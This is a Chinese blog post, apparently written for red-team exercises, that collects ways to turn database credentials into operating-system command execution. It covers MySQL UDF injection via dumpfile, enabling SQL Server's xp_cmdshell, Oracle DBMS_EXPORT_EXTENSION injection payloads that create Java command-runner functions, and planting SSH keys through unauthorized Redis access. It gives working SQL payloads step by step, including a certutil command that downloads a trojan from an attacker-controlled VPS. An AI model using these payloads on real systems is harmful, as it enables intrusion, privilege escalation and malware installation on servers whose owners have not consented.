<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.xn--jpru96amjlpmr.top","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="在hw时常常能从配置文件中获得一些数据库的账号密码，然后就可以尝试利用数据库运行系统命令达到上线等目的。 0x01 mysql的udf提权1 前提1.select @@secure_file_priv secure_file_priv参数值表示有导入导出权限的路径 为空或为需要操作文件夹的父目录。 如果该参数为空（不是null），则表示可以向任何目录写操作 2.数据库版本不同，udf.dll放置目">
<meta property="og:type" content="article">
<meta property="og:title" content="数据库提权合集">
<meta property="og:url" content="https://www.可爱挺萌.top/2021/04/03/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83%E5%90%88%E9%9B%86/index.html">
<meta property="og:site_name" content="可爱挺萌">
<meta property="og:description" content="在hw时常常能从配置文件中获得一些数据库的账号密码，然后就可以尝试利用数据库运行系统命令达到上线等目的。 0x01 mysql的udf提权1 前提1.select @@secure_file_priv secure_file_priv参数值表示有导入导出权限的路径 为空或为需要操作文件夹的父目录。 如果该参数为空（不是null），则表示可以向任何目录写操作 2.数据库版本不同，udf.dll放置目">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404005918.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010108.png">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010210.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010235.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010249.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010300.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010329.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406195446.png">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010350.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010412.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010443.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406213502.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406213507.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406213403.PNG">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406222234.png">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406222320.png">
<meta property="og:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406222401.png">
<meta property="article:published_time" content="2021-04-03T10:32:53.000Z">
<meta property="article:modified_time" content="2021-04-07T06:56:46.554Z">
<meta property="article:author" content="keaitm">
<meta property="article:tag" content="上线">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404005918.PNG">

<link rel="canonical" href="https://www.可爱挺萌.top/2021/04/03/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83%E5%90%88%E9%9B%86/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>数据库提权合集 | 可爱挺萌</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">可爱挺萌</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">可爱真tm萌</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.可爱挺萌.top/2021/04/03/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83%E5%90%88%E9%9B%86/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="keaitm">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="可爱挺萌">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          数据库提权合集
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-04-03 18:32:53" itemprop="dateCreated datePublished" datetime="2021-04-03T18:32:53+08:00">2021-04-03</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-04-07 14:56:46" itemprop="dateModified" datetime="2021-04-07T14:56:46+08:00">2021-04-07</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><strong>在hw时常常能从配置文件中获得一些数据库的账号密码，然后就可以尝试利用数据库运行系统命令达到上线等目的。</strong></p>
<h2 id="0x01-mysql的udf提权"><a href="#0x01-mysql的udf提权" class="headerlink" title="0x01 mysql的udf提权"></a>0x01 mysql的udf提权</h2><h4 id="1-前提"><a href="#1-前提" class="headerlink" title="1 前提"></a>1 前提</h4><p>1.<code>select @@secure_file_priv</code></p>
<p>secure_file_priv参数值表示有导入导出权限的路径</p>
<p>为空或为需要操作文件夹的父目录。</p>
<p>如果该参数为空（不是null），则表示可以向任何目录写操作</p>
<p>2.数据库版本不同，udf.dll放置目录不同</p>
<p>​    version&lt;5.1    c:\windows\system32</p>
<p>​    version&gt;=5.1  mysql安装目录\lib\plugin</p>
<p>3.注意数据库是32位还是64位，根据位数选择udf的dll（或so）</p>
<p>​    使用<code>SHOW VARIABLES LIKE &#39;%version%&#39;</code>查看</p>
<p>4.账户对数据库有插入的权限</p>
<h4 id="2-开淦"><a href="#2-开淦" class="headerlink" title="2 开淦"></a>2 开淦</h4><p>用<code>MySQL5.1.60</code>来一遍完整流程，udf函数库的话，linux用so文件就可以了（应该吧）：</p>
<p>首先，运行以下三行代码分别获得secure_file_priv、版本信息、安装路径</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> @<span class="variable">@secure</span>_file_priv;</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404005918.PNG" alt="1"></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SHOW</span> VARIABLES <span class="keyword">LIKE</span> <span class="string">&#x27;%version%&#x27;</span>;  <span class="operator">/</span><span class="operator">/</span>mysql版本和位数</span><br></pre></td></tr></table></figure>

<img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010108.png" alt="image-20210404010108500" style="zoom:50%;" />

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> @<span class="variable">@basedir</span>;  <span class="operator">/</span><span class="operator">/</span>mysql安装目录</span><br></pre></td></tr></table></figure>

<img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010210.PNG" alt="3" style="zoom: 150%;" />



<p>MySQL5.1.60目录下开始是没有lib\plugin目录的</p>
<p><img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010235.PNG" alt="无dir"></p>
<p>mysql一般默认是没有lib\plugin目录的（据说安装完整版mysql就会有）</p>
<p>在低版本的mysql中可以使用NTFS流创建lib\plugin目录，具体命令如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SELECT &#39;1&#39; into dumpfile &#39;F:&#x2F;phpstudy8.1&#x2F;phpstudy_pro&#x2F;Extensions&#x2F;MySQL5.1.60\\lib::$INDEX_ALLOCATION&#39;;</span><br><span class="line">SELECT &#39;1&#39; into dumpfile &#39;F:&#x2F;phpstudy8.1&#x2F;phpstudy_pro&#x2F;Extensions&#x2F;MySQL5.1.60&#x2F;lib\\plugin::$INDEX_ALLOCATION&#39;;</span><br><span class="line">&#x2F;&#x2F;运行报Error writing则说明文件夹创建成功</span><br><span class="line">&#x2F;&#x2F;若报Permission denied则说明失败</span><br></pre></td></tr></table></figure>

<p>​    <img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010249.PNG" alt="lib"></p>
<p><img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010300.PNG" alt="plugin"></p>
<p>​    –tips:mysql<code>5.1.60</code>版本还能用，版本再高就不一定了，高版本mysql会限制流的使用。</p>
<p>​    高版本没有lib\plugin目录目前不知道怎么解决，希望有大佬能指点！</p>
<p>​    </p>
<p>​    利用dumpfile写入udf.dll文件，这里要先把文件转换为16进制数据，用UltraEdit列模式复制出来16进制数据，然后写个小脚本把空格和\n删掉。</p>
<p><img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010329.PNG" alt="hex"></p>
<p>脚本大概有这么小：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">lines=[]</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;udf.txt&quot;</span>, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> file_to_read:</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        line = file_to_read.readline()</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> line:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        line = line.strip(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">        line = line.replace(<span class="string">&quot; &quot;</span>,<span class="string">&quot;&quot;</span>)</span><br><span class="line">        lines.append(line)</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;new.txt&quot;</span>, <span class="string">&#x27;a&#x27;</span>) <span class="keyword">as</span> new:</span><br><span class="line">    <span class="keyword">for</span> a <span class="keyword">in</span> lines:</span><br><span class="line">        new.write(a)</span><br></pre></td></tr></table></figure>

<p>udf.dll可以在msf中获得：</p>
<p>默认为<code>/usr/share/metasploit-framework/data/exploits/mysql</code>目录</p>
<p><img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406195446.png" alt="msf"></p>
<p>使用dumpfile写入udf.dll：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> unhex(<span class="string">&#x27;dll文件的16进制编码，不要空格和换行，很长一串&#x27;</span>) <span class="keyword">into</span> dumpfile <span class="string">&#x27;F:/phpstudy8.1/phpstudy_pro/Extensions/MySQL5.1.60/lib/plugin/udf.dll&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>写入成功。</p>
<p><img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010350.PNG" alt="write"></p>
<p>使用create function创建自定义函数 sys_eval()：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">create</span> <span class="keyword">function</span> sys_eval <span class="keyword">returns</span> string soname <span class="string">&#x27;udf.all&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>可用函数在dll文件中查看：</p>
<p><img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010412.PNG" alt="func"></p>
<p>使用sys_eval()</p>
<img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210404010443.PNG" alt="exec" style="zoom:200%;" />

<p>接下来就可以进行certutil下马之类的操作了。</p>
<p>enjoy it！</p>
<h2 id="0x02-SQL-Server的xp-cmdshell"><a href="#0x02-SQL-Server的xp-cmdshell" class="headerlink" title="0x02 SQL Server的xp_cmdshell"></a>0x02 SQL Server的xp_cmdshell</h2><p>SQL Server由于有xp_cmdshell操作相对简单</p>
<h4 id="1-前提-1"><a href="#1-前提-1" class="headerlink" title="1 前提"></a>1 前提</h4><p>拥有sa权限账户</p>
<h4 id="2-开淦-1"><a href="#2-开淦-1" class="headerlink" title="2 开淦"></a>2 开淦</h4><p>xp_cmdshell一般默认是关闭的，我们要先把这个模块开启</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span>要先选择master数据库，剑仙说全版本适用</span><br><span class="line">sp_configure <span class="string">&#x27;show advanced options&#x27;</span>,<span class="number">1</span></span><br><span class="line">reconfigure</span><br><span class="line">go</span><br><span class="line">sp_configure <span class="string">&#x27;xp_cmdshell&#x27;</span>,<span class="number">1</span></span><br><span class="line">reconfigure</span><br><span class="line">go</span><br></pre></td></tr></table></figure>

<p>xp_cmdshell还有可能被删除，可以尝试恢复</p>
<h1 id="交给你了，峰"><a href="#交给你了，峰" class="headerlink" title="==交给你了，峰=="></a>==交给你了，峰==</h1><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">exec</span> sp_dropextendedproc <span class="string">&#x27;xp_cmdshell&#x27;</span> dbcc addextendedproc(&quot;xp_cmdshell&quot;,&quot;xplog70.dll&quot;) <span class="keyword">OR</span> dbcc addextendedproc(&quot;xp_cmdshell&quot;,&quot;d:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll&quot;);</span><br><span class="line">————————————————</span><br><span class="line">版权声明：本文为CSDN博主「逐梦_Fighter」的原创文章，遵循CC <span class="number">4.0</span> <span class="keyword">BY</span><span class="operator">-</span>SA版权协议，转载请附上原文出处链接及本声明。</span><br><span class="line">原文链接：https:<span class="operator">/</span><span class="operator">/</span>blog.csdn.net<span class="operator">/</span>qq_37286368<span class="operator">/</span>article<span class="operator">/</span>details<span class="operator">/</span><span class="number">107047907</span></span><br></pre></td></tr></table></figure>

<p>开启xp_cmdshell后就可以通过数据库执行系统命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">exec xp_cmdshell &#39;whoami&#39;</span><br><span class="line">&#x2F;&#x2F;例：可以使用xp_cmdshell进行下马操作，需要在vps上开一个http服务</span><br><span class="line">exec xp_cmdshell &#39;certutil.exe -urlcache -split -f http:&#x2F;&#x2F;vps_ip:vps_port&#x2F;你的马.exe  c:\temp\a.exe&#39;;</span><br></pre></td></tr></table></figure>



<h2 id="0x03-oracle的DBMS-EXPORT-EXTENSION-漏洞"><a href="#0x03-oracle的DBMS-EXPORT-EXTENSION-漏洞" class="headerlink" title="0x03 oracle的DBMS_EXPORT_EXTENSION()漏洞"></a>0x03 oracle的DBMS_EXPORT_EXTENSION()漏洞</h2><h4 id="1-前提-2"><a href="#1-前提-2" class="headerlink" title="1 前提"></a>1 前提</h4><p>1.拥有一个有create session权限的账户</p>
<p>2.DBMS_EXPORT_EXTENSION()漏洞存在</p>
<p>DBMS_EXPORT_EXTENSION()中的GET_DOMAIN_INDEX_TABLES()函数是以sys权限定义，当其被低权限用户调用时将会以sys权限执行。</p>
<h4 id="2-开淦-2"><a href="#2-开淦-2" class="headerlink" title="2 开淦"></a>2 开淦</h4><p>数据库为oracle10g的 <code>10.2.0.1</code>版本。</p>
<p>创建一个低权限用户test</p>
<img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406213502.PNG" style="zoom:150%;" />

<p><img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406213507.PNG" alt="puser"></p>
<p>本人不擅长oracle，这里直接使用了redn3ck大佬的payload。</p>
<p>1.创建java代码LinxUtil：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(&#39;FOO&#39;,&#39;BAR&#39;,&#39;DBMS_OUTPUT&quot;.PUT(:P1);EXECUTE IMMEDIATE &#39;&#39;DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE &#39;&#39;&#39;&#39;create or replace and compile java source named &quot;LinxUtil&quot; as import java.io.*; public class LinxUtil extends Object &#123;public static String runCMD(String args)&#123;try&#123;BufferedReader myReader&#x3D; new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str&#x3D;&quot;&quot;;while ((stemp &#x3D; myReader.readLine()) !&#x3D; null) str +&#x3D;stemp+&quot;\n&quot;;myReader.close();return str;&#125; catch (Exception e)&#123;return e.toString();&#125;&#125;public static String readFile(String filename)&#123;try&#123;BufferedReader myReader&#x3D; new BufferedReader(new FileReader(filename)); String stemp,str&#x3D;&quot;&quot;;while ((stemp &#x3D; myReader.readLine()) !&#x3D; null) str +&#x3D;stemp+&quot;\n&quot;;myReader.close();return str;&#125; catch (Exception e)&#123;return e.toString();&#125;&#125;&#125;&#39;&#39;&#39;&#39;;END;&#39;&#39;;END;--&#39;,&#39;SYS&#39;,0,&#39;1&#39;,0) from dual</span><br></pre></td></tr></table></figure>

<p>2.赋予public用户java权限：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(&#39;FOO&#39;,&#39;BAR&#39;,&#39;DBMS_OUTPUT&quot;.PUT(:P1);EXECUTE IMMEDIATE &#39;&#39;DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE &#39;&#39;&#39;&#39;begin dbms_java.grant_permission(&#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;PUBLIC&#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;, &#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;SYS:java.io.FilePermission&#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;,&#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;&lt;&gt;&#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;, &#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;execute&#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;);end;&#39;&#39;&#39;&#39;;END;&#39;&#39;;END;--&#39;,&#39;SYS&#39;,0,&#39;1&#39;,0) from dual</span><br></pre></td></tr></table></figure>

<p>3.创建系统命令调用函数LinxRunCMD：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(&#39;FOO&#39;,&#39;BAR&#39;,&#39;DBMS_OUTPUT&quot;.PUT(:P1);EXECUTE IMMEDIATE &#39;&#39;DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE &#39;&#39;&#39;&#39;create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name&#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;LinxUtil.runCMD(java.lang.String) return String&#39;&#39;&#39;&#39;&#39;&#39;&#39;&#39;;&#39;&#39;&#39;&#39;;END;&#39;&#39;;END;--&#39;,&#39;SYS&#39;,0,&#39;1&#39;,0) from dual</span><br></pre></td></tr></table></figure>

<p>4.将LinxRunCMD函数执行权限赋予public用户：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(&#39;FOO&#39;,&#39;BAR&#39;,&#39;DBMS_OUTPUT&quot;.PUT(:P1);EXECUTE IMMEDIATE &#39;&#39;DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE &#39;&#39;&#39;&#39;grant all on LinxRunCMD to public&#39;&#39;&#39;&#39;;END;&#39;&#39;;END;--&#39;,&#39;SYS&#39;,0,&#39;1&#39;,0) from dual</span><br></pre></td></tr></table></figure>

<p>5.使用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select sys.LinxRunCMD(&#39;whoami&#39;) from dual</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406213403.PNG" alt="cmd"></p>
<p>接下来就是愉快的上线环节。</p>
<h2 id="0x04-未授权访问redis利用SSH-key"><a href="#0x04-未授权访问redis利用SSH-key" class="headerlink" title="0x04 未授权访问redis利用SSH key"></a>0x04 未授权访问redis利用SSH key</h2><p>实战很少能用，一般遇到的redis权限都比较低。</p>
<h4 id="1-前提-3"><a href="#1-前提-3" class="headerlink" title="1 前提"></a>1 前提</h4><p>需要高权限redis账户，能对目标文件夹写入操作。</p>
<h4 id="2-开淦-3"><a href="#2-开淦-3" class="headerlink" title="2 开淦"></a>2 开淦</h4><p>在本地生成rsa密钥对：</p>
<p>1.在/root/.ssh目录运行<code>ssh-keygen -t rsa</code>命令，然后一直回车，得到rsa密钥对。</p>
<img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406222234.png" alt="image-20210406222234920" style="zoom:80%;" />

<p>2.将公钥id-rsa.pub写入目标机/root/.ssh目录下的authorized_keys文件中：</p>
<img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406222320.png" alt="image-20210406222320896" style="zoom:80%;" />

<p>3.直接在.ssh目录下尝试用rsa文件连接目标机：</p>
<img src="https://gitee.com/lovely_sprout/image/raw/master/tupian/20210406222401.png" alt="image-20210406222401862" style="zoom:80%;" />

<p>成功，开始为所欲为。</p>
<p><strong>可以利用相似的方法写入webshell，前提是知道绝对路径</strong></p>
<h2 id="0x05-参考"><a href="#0x05-参考" class="headerlink" title="0x05 参考"></a>0x05 参考</h2><p><a target="_blank" rel="noopener" href="https://redn3ck.github.io/2018/04/25/Oracle%E6%B3%A8%E5%85%A5-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-Shell%E5%8F%8D%E5%BC%B9/">Oracle注入 - 命令执行&amp;Shell反弹</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E4%B8%8A%E7%BA%BF/" rel="tag"># 上线</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/20/%E8%AE%B0%E5%BD%95%E7%AC%AC%E4%B8%80%E6%AC%A1hvv%E6%8B%89%E4%BA%86%E6%BB%A1%E6%BB%A1%E4%B8%80%E5%BA%93/" rel="prev" title="记录第一次hvv拉了满满一库">
      <i class="fa fa-chevron-left"></i> 记录第一次hvv拉了满满一库
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-mysql%E7%9A%84udf%E6%8F%90%E6%9D%83"><span class="nav-number">1.</span> <span class="nav-text">0x01 mysql的udf提权</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%89%8D%E6%8F%90"><span class="nav-number">1.0.1.</span> <span class="nav-text">1 前提</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%BC%80%E6%B7%A6"><span class="nav-number">1.0.2.</span> <span class="nav-text">2 开淦</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-SQL-Server%E7%9A%84xp-cmdshell"><span class="nav-number">2.</span> <span class="nav-text">0x02 SQL Server的xp_cmdshell</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%89%8D%E6%8F%90-1"><span class="nav-number">2.0.1.</span> <span class="nav-text">1 前提</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%BC%80%E6%B7%A6-1"><span class="nav-number">2.0.2.</span> <span class="nav-text">2 开淦</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%A4%E7%BB%99%E4%BD%A0%E4%BA%86%EF%BC%8C%E5%B3%B0"><span class="nav-number"></span> <span class="nav-text">&#x3D;&#x3D;交给你了，峰&#x3D;&#x3D;</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-oracle%E7%9A%84DBMS-EXPORT-EXTENSION-%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">0x03 oracle的DBMS_EXPORT_EXTENSION()漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%89%8D%E6%8F%90-2"><span class="nav-number">1.0.1.</span> <span class="nav-text">1 前提</span></a></li><li class="nav-item nav-level-4"><a 